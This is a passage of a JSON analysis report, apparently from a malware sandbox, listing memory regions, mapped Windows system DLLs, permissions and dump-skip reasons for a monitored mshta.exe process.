"version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 344063, "entry_point": 0, "filename": null, "id": "region_430", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:00:31.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 397311, "entry_point": 0, "filename": null, "id": "region_431", "name": "pagefile_0x0000000000060000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 393216, "timestamp": "00:00:31.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 262144, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 1900543, "entry_point": 0, "filename": null, "id": "region_432", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:00:31.220", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_433", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:00:31.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 61440, "start_va": 14614528, "type": "region", "version": 1 }, "end_va": 14675967, "entry_point": 14614528, "filename": "\\Windows\\SysWOW64\\mshta.exe", "id": "region_434", "name": "mshta.exe", "norm_filename": "c:\\windows\\syswow64\\mshta.exe", "region_type": "memory_mapped_file", "start_va": 14614528, "timestamp": "00:00:31.223", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2003566592, "type": "region", "version": 1 }, "end_va": 2005307391, "entry_point": 2003566592, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_435", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2003566592, "timestamp": "00:00:31.231", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1572864, "start_va": 2005532672, "type": "region", "version": 1 }, "end_va": 2007105535, "entry_point": 2005532672, "filename": "\\Windows\\SysWOW64\\ntdll.dll", "id": "region_436", "name": "ntdll.dll", "norm_filename": "c:\\windows\\syswow64\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2005532672, "timestamp": "00:00:31.231", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 2130378752, "type": "region", "version": 1 }, "end_va": 2130522111, "entry_point": 0, "filename": null, "id": "region_437", "name": "pagefile_0x000000007efb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130378752, "timestamp": "00:00:31.232", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 12288, "start_va": 2130554880, "type": "region", "version": 1 }, "end_va": 2130567167, "entry_point": 0, "filename": null, "id": "region_438", "name": "private_0x000000007efdb000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130554880, "timestamp": "00:00:31.232", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130567168, "type": "region", "version": 1 }, "end_va": 2130571263, "entry_point": 0, "filename": null, "id": "region_439", "name": "private_0x000000007efde000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130567168, "timestamp": "00:00:31.232", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2130571264, "type": "region", "version": 1 }, "end_va": 2130575359, "entry_point": 0, "filename": null, "id": "region_440", "name": "private_0x000000007efdf000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130571264, "timestamp": "00:00:31.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_441", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:00:31.234", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_442", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:00:31.235", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "ignored_region" ], "info": "No dump was created because this is an ignored region", "permissions": [ "readable" ], "ref_process_dump": null, "size": 8793945538560, "start_va": 2147418112, "type": "region", "version": 1 }, "end_va": 8796092956671, "entry_point": 0, "filename": null, "id": "region_443", "name": "private_0x000000007fff0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147418112, "timestamp": "00:00:31.235", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 5636096, "type": "region", "version": 1 }, "end_va": 6160383, "entry_point": 0, "filename": null, "id": "region_444", "name": "private_0x0000000000560000", "norm_filename": null, "region_type": "private_memory", "start_va": 5636096, "timestamp": "00:00:31.279", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 32768, "start_va": 1945960448, "type": "region", "version": 1 }, "end_va": 1945993215, "entry_point": 1945968888, "filename": "\\Windows\\System32\\wow64cpu.dll", "id": "region_445", "name": "wow64cpu.dll", "norm_filename": "c:\\windows\\system32\\wow64cpu.dll", "region_type": "memory_mapped_file", "start_va": 1945960448, "timestamp": "00:00:31.279", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 376832, "start_va": 1946025984, "type": "region", "version": 1 }, "end_va": 1946402815, "entry_point": 1946285976, "filename": "\\Windows\\System32\\wow64win.dll", "id": "region_446", "name": "wow64win.dll", "norm_filename": "c:\\windows\\system32\\wow64win.dll", "region_type": "memory_mapped_file", "start_va": 1946025984, "timestamp": "00:00:31.280", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 258048, "start_va": 1946419200, "type": "region", "version": 1 }, "end_va": 1946677247, "entry_point": 1946607224, "filename": "\\Windows\\System32\\wow64.dll", "id": "region_447", "name": "wow64.dll", "norm_filename": "c:\\windows\\system32\\wow64.dll", "region_type": "memory_mapped_file", "start_va": 1946419200, "timestamp": "00:00:31.281", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 7864320, "type": "region", "version": 1 }, "end_va": 8912895, "entry_point": 0, "filename": null, "id": "region_448", "name": "private_0x0000000000780000", "norm_filename": null, "region_type": "private_memory", "start_va": 7864320, "timestamp": "00:00:31.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1114112, "start_va": 1985085440, "type": "region", "version": 1 }, "end_va": 1986199551, "entry_point": 1985163987, "filename": "\\Windows\\SysWOW64\\kernel32.dll", "id": "region_449", "name": "kernel32.dll", "norm_filename": "c:\\windows\\syswow64\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 1985085440, "timestamp": "00:00:31.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 286720, "start_va": 1999372288, "type": "region", "version": 1 }, "end_va": 1999659007, "entry_point": 1999402104, "filename": "\\Windows\\SysWOW64\\KernelBase.dll", "id": "region_450", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\syswow64\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 1999372288, "timestamp": "00:00:31.292", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2001338368, "type": "region", "version": 1 }, "end_va": 2002362367, "entry_point": 0, "filename": null, "id": "region_451", "name": "private_0x00000000774a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2001338368, "timestamp": "00:00:31.293", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2002386944, "type": "region", "version": 1 }, "end_va": 2003562495, "entry_point": 0, "filename": null, "id": "region_452", "name": "private_0x00000000775a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2002386944, "timestamp": "00:00:31.294", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_453", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:00:31.303", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 458752, "type": "region", "version": 1 }, "end_va": 880639, "entry_point": 458752, "filename": "\\Windows\\System32\\locale.nls", "id": "region_454", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 458752, "timestamp": "00:00:31.303", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1967063040, "type": "region", "version": 1 }, "end_va": 1967112191, "entry_point": 1967067361, "filename": "\\Windows\\SysWOW64\\cryptbase.dll", "id": "region_455", "name": "cryptbase.dll", "norm_filename": "c:\\windows\\syswow64\\cryptbase.dll", "region_type": "memory_mapped_file", "start_va": 1967063040, "timestamp": "00:00:31.303", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1967128576, "type": "region", "version": 1 }, "end_va": 1967521791, "entry_point": 1967236019, "filename": "\\Windows\\SysWOW64\\sspicli.dll", "id": "region_456", "name": "sspicli.dll", "norm_filename": "c:\\windows\\syswow64\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 1967128576, "timestamp": "00:00:31.304", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 704512, "start_va": 1968832512, "type": "region", "version": 1 }, "end_va": 1969537023, "entry_point": 1968874610, "filename": "\\Windows\\SysWOW64\\msvcrt.dll", "id": "region_457", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\syswow64\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 1968832512, "timestamp": "00:00:31.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 655360, "start_va": 1983840256, "type": "region", "version": 1 }, "end_va": 1984495615, "entry_point": 1983924709, "filename": "\\Windows\\SysWOW64\\advapi32.dll", "id": "region_458", "name": "advapi32.dll", "norm_filename": "c:\\windows\\syswow64\\advapi32.dll", "region_type": "memory_mapped_file", "start_va": 1983840256, "timestamp": "00:00:31.305", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 983040, "start_va": 1986592768, "type": "region", "version": 1 }, "end_va": 1987575807, "entry_point": 1986659689, "filename": "\\Windows\\SysWOW64\\rpcrt4.dll", "id": "region_459", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\syswow64\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 1986592768, "timestamp": "00:00:31.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 102400, "start_va": 1989804032, "type": "region", "version": 1 }, "end_va": 1989906431, "entry_point": 1989822837, "filename": "\\Windows\\SysWOW64\\sechost.dll", "id": "region_460", "name": "sechost.dll", "norm_filename": "c:\\windows\\syswow64\\sechost.dll", "region_type": "memory_mapped_file", "start_va": 1989804032, "timestamp": "00:00:31.306", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_461", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:00:31.307", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_462", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:00:31.307", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 4915200, "type": "region", "version": 1 }, "end_va": 4980735, "entry_point": 0, "filename": null, "id": "region_463", "name": "private_0x00000000004b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 4915200, "timestamp": "00:00:31.310", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2686976, "type": "region", "version": 1 }, "end_va": 2752511, "entry_point": 0, "filename": null, "id": "region_464", "name": "private_0x0000000000290000", "norm_filename": null, "region_type": "private_memory", "start_va": 2686976, "timestamp": "00:00:31.311", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "untracked_file_region" ], "info": "No dump was created because mapped file is not tracked", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 5992448, "start_va": 1869217792, "type": "region", "version": 1 }, "end_va": 1875210239, "entry_point": 1869217792, "filename": "\\Windows\\SysWOW64\\mshtml.dll", "id": "region_465", "name": "mshtml.dll", "norm_filename": "c:\\windows\\syswow64\\mshtml.dll", "region_type": "memory_mapped_file", "start_va": 1869217792, "timestamp": "00:00:31.389", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 20480, "start_va": 2005336064, "type": "region", "version": 1 }, "end_va": 2005356543, "entry_point": 2005336064, "filename": "\\Windows\\SysWOW64\\psapi.dll", "id": "region_466", "name": "psapi.dll", "norm_filename": "c:\\windows\\syswow64\\psapi.dll", "region_type": "memory_mapped_file", "start_va": 2005336064, "timestamp": "00:00:31.476", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 589824, "start_va": 2000748544, "type": "region", "version": 1 }, "end_va": 2001338367, "entry_point": 2000839491, "filename": "\\Windows\\SysWOW64\\gdi32.dll", "id": "region_467", "name": "gdi32.dll", "norm_filename": "c:\\windows\\syswow64\\gdi32.dll", "region_type": "memory_mapped_file", "start_va": 2000748544, "timestamp": "00:00:31.484", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1048576, "start_va": 1999699968, "type": "region", "version": 1 }, "end_va": 2000748543, "entry_point": 1999812333, "filename": "\\Windows\\SysWOW64\\user32.dll", "id": "region_468", "name": "user32.dll", "norm_filename": "c:\\windows\\syswow64\\user32.dll", "region_type": "memory_mapped_file", "start_va": 1999699968, "timestamp": "00:00:31.485", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 40960, "start_va": 1995046912, "type": "region", "version": 1 }, "end_va": 1995087871, "entry_point": 1995060896, "filename": "\\Windows\\SysWOW64\\lpk.dll", "id": "region_469", "name": "lpk.dll", "norm_filename": "c:\\windows\\syswow64\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 1995046912, "timestamp": "00:00:31.486", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 643072, "start_va": 1992884224, "type": "region", "version": 1 }, "end_va": 1993527295, "entry_point": 1993097175, "filename": "\\Windows\\SysWOW64\\usp10.dll", "id": "region_470", "name": "usp10.dll", "norm_filename": "c:\\windows\\syswow64\\usp10.dll", "region_type": "memory_mapped_file", "start_va": 1992884224, "timestamp": "00:00:31.488", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1425408, "start_va": 1993539584, "type": "region", "version": 1 }, "end_va": 1994964991, "entry_point": 1993849405, "filename": "\\Windows\\SysWOW64\\ole32.dll", "id": "region_471", "name": "ole32.dll", "norm_filename": "c:\\windows\\syswow64\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 1993539584, "timestamp": "00:00:31.489", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1269760, "start_va": 1967521792, "type": "region", "version": 1 }, "end_va": 1968791551, "entry_point": 1967521792, "filename": "\\Windows\\SysWOW64\\urlmon.dll", "id": "region_472", "name": "urlmon.dll", "norm_filename": "c:\\windows\\syswow64\\urlmon.dll", "region_type": "memory_mapped_file", "start_va": 1967521792, "timestamp": "00:00:31.490", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1003520, "start_va": 1982791680, "type": "region", "version": 1 }, "end_va": 1983795199, "entry_point": 1982791680, "filename": "\\Windows\\SysWOW64\\wininet.dll", "id": "region_473", "name": "wininet.dll", "norm_filename": "c:\\windows\\syswow64\\wininet.dll", "region_type": "memory_mapped_file", "start_va": 1982791680, "timestamp": "00:00:31.514", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 356352, "start_va": 1987575808, "type": "region", "version": 1 }, "end_va": 1987932159, "entry_point": 1987681190, "filename": "\\Windows\\SysWOW64\\shlwapi.dll", "id": "region_474", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\syswow64\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 1987575808, "timestamp": "00:00:31.529", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2076672, "start_va": 1995636736, "type": "region", "version": 1 }, "end_va": 1997713407, "entry_point": 1995636736, "filename": "\\Windows\\SysWOW64\\iertutil.dll", "id": "region_475", "name": "iertutil.dll", "norm_filename": "c:\\windows\\syswow64\\iertutil.dll", "region_type": "memory_mapped_file", "start_va": 1995636736, "timestamp": "00:00:31.531", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 585728, "start_va": 1989214208, "type": "region", "version": 1 }, "end_va": 1989799935, "entry_point": 1989230513, "filename": "\\Windows\\SysWOW64\\oleaut32.dll", "id": "region_476", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\syswow64\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 1989214208, "timestamp": "00:00:31.541", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1167360, "start_va": 1989935104, "type": "region", "version": 1 }, "end_va": 1991102463, "entry_point": 1989940618, "filename": "\\Windows\\SysWOW64\\crypt32.dll", "id": "region_477", "name": "crypt32.dll", "norm_filename": "c:\\windows\\syswow64\\crypt32.dll", "region_type": "memory_mapped_file", "start_va": 1989935104, "timestamp": "00:00:31.542", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 1994981376, "type": "region", "version": 1 }, "end_va": 1995030527, "entry_point": 1994990478, "filename": "\\Windows\\SysWOW64\\msasn1.dll", "id": "region_478", "name": "msasn1.dll", "norm_filename": "c:\\windows\\syswow64\\msasn1.dll", "region_type": "memory_mapped_file", "start_va": 1994981376, "timestamp": "00:00:31.543", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 172032, "start_va": 1964441600, "type": "region", "version": 1 }, "end_va": 1964613631, "entry_point": 1964441600, "filename": "\\Windows\\SysWOW64\\msls31.dll", "id": "region_479", "name": "msls31.dll", "norm_filename": "c:\\windows\\syswow64\\msls31.dll", "region_type": "memory_mapped_file", "start_va": 1964441600, "timestamp": "00:00:31.552", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 36864, "start_va": 1958019072, "type": "region", "version": 1 }, "end_va": 1958055935, "entry_point": 1958023712, "filename": "\\Windows\\SysWOW64\\version.dll", "id": "region_480", "name": "version.dll", "norm_filename": "c:\\windows\\syswow64\\version.dll", "region_type": "memory_mapped_file", "start_va": 1958019072, "timestamp": "00:00:31.566", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 122880, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 253951, "entry_point": 202127, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_481", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 131072, "timestamp": "00:00:31.570", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 6160384, "type": "region", "version": 1 }, "end_va": 7766015, "entry_point": 0, "filename": null, "id": "region_482", "name": "pagefile_0x00000000005e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 6160384, "timestamp": "00:00:31.571", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 393216, "start_va": 1987969024, "type": "region", "version": 1 }, "end_va": 1988362239, "entry_point": 1988040079, "filename": "\\Windows\\SysWOW64\\imm32.dll", "id": "region_484", "name": "imm32.dll", "norm_filename": "c:\\windows\\syswow64\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 1987969024, "timestamp": "00:00:31.573", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 835584, "start_va": 1998520320, "type": "region", "version": 1 }, "end_va": 1999355903, "entry_point": 1998526091, "filename": "\\Windows\\SysWOW64\\msctf.dll", "id": "region_485", "name": "msctf.dll", "norm_filename": "c:\\windows\\syswow64\\msctf.dll", "region_type": "memory_mapped_file", "start_va": 1998520320, "timestamp": "00:00:31.574", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 8912896, "type": "region", "version": 1 }, "end_va": 10489855, "entry_point": 0, "filename": null, "id": "region_486", "name": "pagefile_0x0000000000880000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8912896, "timestamp": "00:00:31.578", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 14680064, "type": "region", "version": 1 }, "end_va": 35651583, "entry_point": 0, "filename": null, "id": "region_487", "name": "pagefile_0x0000000000e00000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 14680064, "timestamp": "00:00:31.578", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 159743, "entry_point": 0, "filename": null, "id": "region_488", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:00:31.581", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 204799, "entry_point": 0, "filename": null, "id": "region_489", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:00:31.581", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 917504, "type": "region", "version": 1 }, "end_va": 921599, "entry_point": 917504, "filename": "\\Windows\\SysWOW64\\en-US\\mshta.exe.mui", "id": "region_490", "name": "mshta.exe.mui", "norm_filename": "c:\\windows\\syswow64\\en-us\\mshta.exe.mui", "region_type": "memory_mapped_file", "start_va": 917504, "timestamp": "00:00:31.581", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_total_dump_size_reached" ], "info": "No dump or only a partial dump was created because the total dump size was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, 